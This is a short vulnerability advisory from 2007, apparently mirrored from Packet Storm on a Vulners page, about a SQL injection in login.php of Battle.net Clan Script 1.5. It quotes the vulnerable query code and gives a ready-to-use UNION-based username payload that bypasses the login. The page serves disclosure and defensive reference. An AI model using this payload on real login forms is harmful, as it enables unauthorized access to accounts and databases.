Lucene search

K

battlenet-sql.txt

🗓️ 10 Apr 2007 00:00:00Reported by h a c k e r _ XType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

Battle.net Clan Script 1.5 login.php SQL injection attac

Show more
Code
`****************************************  
  
script : Battle.net Clan Script 1.5  
file : login.php  
attack : injection sql  
  
auteur : h a c k e r _ X  
  
***************************************  
  
code :  
------------------------------------------------------------------------------------------  
  
line 9 --> $user = $_POST['user'];  
line 10--> $pass = $_POST['pass'];  
  
.....  
.....  
.....  
  
line 21--> mysql_query("SELECT * FROM bcs_members WHERE name='$user' AND password='$pass'", $link);  
*******  
  
-------------------------------------------------------------------------------------------------  
  
  
exploit :  
*******  
  
Username : ' union select 0,0,0,0,0,0,0,0,0,0,0 from bcs_members/*  
password : enything  
  
  
  
  
  
************************************************** *  
thinks to : max007,simo64,brutalism and all marocains hackers  
  
special thinks for "P Y N S S O"  
  
************************************************** *  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
10 Apr 2007 00:00Current
7.4High risk
Vulners AI Score7.4
19
.json
Report